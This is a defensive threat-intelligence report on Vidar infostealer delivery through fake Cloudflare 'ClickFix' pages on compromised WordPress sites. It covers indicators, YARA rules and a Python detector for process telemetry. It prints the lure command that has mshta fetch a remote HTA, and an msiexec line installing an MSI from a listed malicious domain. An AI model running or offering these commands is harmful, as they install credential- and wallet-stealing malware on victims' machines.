
Analysis: Vidar Infostealer Campaigns Weaponize "ClickFix" Tactics via Compromised CMS


In the evolving landscape of cybercrime, the barrier to entry for distributing sophisticated malware is increasingly shifting from technical exploits to advanced social engineering. Recent findings analyzed by the SecLookup Threat Research team, in conjunction with reports from Malwarebytes Labs, highlight a resurgence of the Vidar Infostealer being distributed via "ClickFix" tactics. This campaign leverages compromised WordPress websites across the globe—including Italy, France, the United States, and Brazil—to trick users into manually executing malicious commands. By mimicking legitimate security verification services like Cloudflare, threat actors bypass traditional browser-based sandbox protections, forcing the user to become the final link in the infection chain.

Executive Summary

The latest Vidar campaign demonstrates a sophisticated use of the "ClickFix" or "Fake CAPTCHA" technique. Rather than relying on automated browser vulnerabilities, which are frequently patched, attackers exploit human psychology. Visitors to compromised WordPress sites are presented with a highly convincing "Verifying you are human" page. Under the guise of solving a CAPTCHA, the user is instructed to copy and paste a command into their Windows Run dialog or PowerShell terminal. This command initiates a chain of events that utilizes built-in Windows binaries—specifically mshta.exe—to download and execute the Vidar infostealer. SecLookup has been actively tracking this infrastructure and confirmed the malicious nature of key domains, such as walwood.be, associated with these delivery operations.

Threat Analysis: The ClickFix Evolution

The "ClickFix" technique represents a shift toward "browser-out" infections. Instead of a file downloading automatically (which triggers "Mark of the Web" warnings or EDR alerts upon execution), the attacker convinces the user that their browser is "broken" or needs verification.

The Infection Vector: Compromised CMS

The campaign primarily targets WordPress installations. Once a site is compromised—likely through credential stuffing or known plugin vulnerabilities—the attackers inject a script that redirects users to a fake Cloudflare verification page. This page is designed to appear identical to a legitimate "Under Attack Mode" or "Turnstile" challenge.

Technical Chain: Abusing Mshta.exe

When a user follows the instructions on the fake CAPTCHA page, they are typically told to press Win+R, paste a command, and press Enter. The command observed in this campaign follows a specific pattern:

mshta https://{compromised-website}/challenge/cf

Mshta.exe (Microsoft HTML Application Host) is a legitimate Windows utility used to execute .hta files. Because it is a signed Microsoft binary, it is frequently used by threat actors as a "Living-off-the-Land" binary (LoLBin) to bypass application whitelisting. In this context, mshta fetches a remote HTA script from the compromised site's /challenge/cf directory. This script then executes an obfuscated payload that downloads the final Vidar installer, often in the form of an .msi file.

Vidar Infostealer Capabilities

Vidar is a prolific "stealer-as-a-service" malware that has been active since 2018. Once executed, it resides primarily in memory to evade file-based antivirus scanning. Its primary objectives include:

  • Credential Harvesting: Extracting usernames and passwords from over 30 different web browsers (Chrome, Firefox, Edge, etc.).

  • Cryptocurrency Theft: Searching for local wallet files (e.g., Electrum, Ethereum, Exodus) and browser-based wallet extensions.

  • Session Hijacking: Stealing browser cookies and authentication tokens to bypass Multi-Factor Authentication (MFA).

  • System Profiling: Collecting hardware specs, IP addresses, and screenshots of the victim's desktop.

  • Data Exfiltration: Once the data is staged, it is compressed into a ZIP file and sent to a remote Command and Control (C2) server.

MITRE ATT&CK Mapping

The TTPs observed in this campaign align with the following MITRE ATT&CK techniques:

| ID | Technique | Description |
| --- | --- | --- |
| T1566.002 | Phishing: Spearphishing Link | Users are directed to compromised websites via various external vectors. |
| T1204.001 | User Execution: Malicious Link | The attack relies on the user manually entering commands provided by the site. |
| T1218.005 | System Binary Proxy Execution: Mshta | Use of mshta.exe to execute malicious HTA files. |
| T1059.007 | Command and Scripting Interpreter: JavaScript | The fake CAPTCHA pages utilize JS to facilitate the social engineering. |
| T1005 | Data from Local System | Vidar targets local browser databases and wallet files. |
| T1041 | Exfiltration Over C2 Channel | Stolen data is sent to attacker-controlled infrastructure. |

Indicators of Compromise (IOCs)

SecLookup has confirmed the following indicators as malicious. Security teams should monitor for any outbound traffic to these domains or execution patterns involving these URL structures.

Confirmed Malicious Domains

walwood[.]be

Malicious URLs

https://walwood[.]be/474a2b77/5ef46f21e2.msi
https://{compromised-website}/challenge/cf
https://{compromised-website}/474a2b77/5ef46f21e2.msi

Detection Rules

YARA Rule: Vidar ClickFix Delivery Command

This rule targets the specific command line arguments used to trigger the mshta download.

rule Vidar_ClickFix_Delivery_Command {
    meta:
        description = "Detects the mshta command pattern used in ClickFix campaigns to download Vidar payloads"
        threat_name = "Vidar Infostealer"
        technique = "ClickFix / Fake CAPTCHA"
    strings:
        $mshta = "mshta" nocase
        $path = "/challenge/cf" ascii wide
        $protocol1 = "https://" ascii wide
        $protocol2 = "http://" ascii wide
    condition:
        $mshta and $path and ($protocol1 or $protocol2)
}

YARA Rule: Fake Cloudflare Verification Page

This rule identifies the source code of the malicious HTML landing pages.

rule Fake_Cloudflare_Verification_ClickFix {
    meta:
        description = "Detects HTML/JS content of fake Cloudflare verification pages used for malware delivery"
        threat_name = "Vidar Infostealer"
    strings:
        $s1 = "Verifying you are human" ascii wide
        $s2 = "mshta" ascii wide
        $s3 = "/challenge/cf" ascii wide
        $s4 = "walwood.be" ascii wide
    condition:
        $s1 and ($s2 and $s3) or $s4
}

SecLookup Detection

The SecLookup threat intelligence platform was actively detecting and blocking the domains and infrastructure associated with this Vidar campaign prior to public disclosure. Our platform identified walwood[.]be as a malicious distribution point.

Subscribers to SecLookup’s feed were protected through automated updates to their DNS firewalls and EDR blocklists. Our continuous monitoring of compromised CMS environments allows us to provide early warning indicators for "ClickFix" campaigns, ensuring that SOC analysts can intercept these threats before a user manually executes the malicious payload.

Recommendations

To defend against Vidar and similar social engineering-led campaigns, SecLookup recommends the following actions:

  1. Restrict Mshta Execution: Use Windows Attack Surface Reduction (ASR) rules or AppLocker to block or audit the execution of mshta.exe unless strictly required for business operations.

  2. User Education: Conduct specialized phishing training that highlights "ClickFix" tactics. Emphasize that legitimate services like Cloudflare or Google CAPTCHA will never ask a user to run a command or use the Windows Run dialog.

  3. Endpoint Monitoring: Configure EDR tools to alert on unusual parent-child process relationships, such as browser.exe (Chrome/Edge) spawning cmd.exe, powershell.exe, or mshta.exe.

  4. Network Filtering: Implement a robust DNS security solution to block access to known malicious domains and newly registered domains (NRDs) frequently used in these campaigns.

  5. Browser Security: Ensure browsers are kept up to date and consider implementing "Safe Browsing" policies that restrict interactions with unverified scripts.
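The detections implied by the mshta command pattern in the Technical Chain section and by the parent/child process monitoring in recommendation 3 can be expressed as one small piece of logic over process-creation telemetry. The Python below is an added example, not code from SecLookup, Malwarebytes or the campaign's authors; it runs over a few constructed Sysmon-style process-creation events (field names borrowed from Sysmon Event ID 1) and flags mshta.exe launched with a remote URL, a browser spawning a LoLBin, and any command line containing one of the report's IOCs. The hostname compromised-site.example is a placeholder standing in for the page's {compromised-website}; walwood.be and the URL paths are the IOCs listed above.

```python
"""Detection logic for the mshta/ClickFix chain described in this report.

Added example, not SecLookup or Malwarebytes code. It runs over constructed
Sysmon-style process-creation events (one JSON record per line) and flags:
  1. mshta.exe started with a remote http(s) URL as its argument (T1218.005)
  2. a browser process spawning mshta.exe, powershell.exe or cmd.exe
  3. any command line containing one of the report's IOCs
"""
import json
import re

# IOCs from the report, stored defanged the way analysts usually keep them.
DEFANGED_IOCS = ["walwood[.]be", "/challenge/cf", "/474a2b77/5ef46f21e2.msi"]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
LOLBIN_CHILDREN = {"mshta.exe", "powershell.exe", "cmd.exe"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def refang(ioc: str) -> str:
    """Turn a defanged indicator ('walwood[.]be', 'hxxps://') back into matchable text."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


IOCS = [refang(i).lower() for i in DEFANGED_IOCS]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path (C:\\Windows\\mshta.exe -> mshta.exe)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event: dict) -> list[str]:
    """Return the names of the detection rules that match one process-creation event."""
    hits = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")

    # Rule 1: mshta.exe fetching an HTA from a remote URL. This is the Win+R step
    # itself; its parent is explorer.exe, not the browser, so rule 2 alone misses it.
    if image == "mshta.exe":
        url = REMOTE_URL.search(cmdline)
        if url:
            hits.append("mshta_remote_url")
            if "/challenge/cf" in url.group(0).lower():
                hits.append("clickfix_challenge_path")

    # Rule 2: the parent/child relationship recommended for EDR alerting.
    if parent in BROWSERS and image in LOLBIN_CHILDREN:
        hits.append("browser_spawned_lolbin")

    # Rule 3: plain IOC match on the command line.
    if any(ioc in cmdline.lower() for ioc in IOCS):
        hits.append("known_ioc_in_cmdline")
    return hits


def scan(log_lines) -> dict[int, list[str]]:
    """Map ProcessId -> matched rules for every event that triggers at least one rule."""
    findings = {}
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        hits = analyze_event(event)
        if hits:
            findings[event["ProcessId"]] = hits
    return findings


# Constructed sample telemetry: two stages of the malicious chain, a browser-spawned
# shell, and two benign baselines (a local .hta and a Chrome renderer child).
SAMPLE_LOG = r"""
{"ProcessId": 4120, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://compromised-site.example/challenge/cf"}
{"ProcessId": 4180, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe \"C:\\Program Files\\Vendor\\help.hta\""}
{"ProcessId": 5012, "ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoProfile"}
{"ProcessId": 5020, "ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "CommandLine": "chrome.exe --type=renderer"}
{"ProcessId": 5300, "ParentImage": "C:\\Windows\\System32\\mshta.exe", "Image": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "msiexec.exe /i https://walwood.be/474a2b77/5ef46f21e2.msi"}
"""

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_LOG.splitlines()).items():
        print(pid, ", ".join(rules))
```

Rule 1 is the one that catches the Run-dialog step of this campaign: because the user types the command into Win+R, the resulting mshta.exe has explorer.exe as its parent, so a browser-to-LoLBin rule on its own would not fire there. The IOC list is kept defanged and refanged at load time, which mirrors how feeds such as the one in this report are usually ingested.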
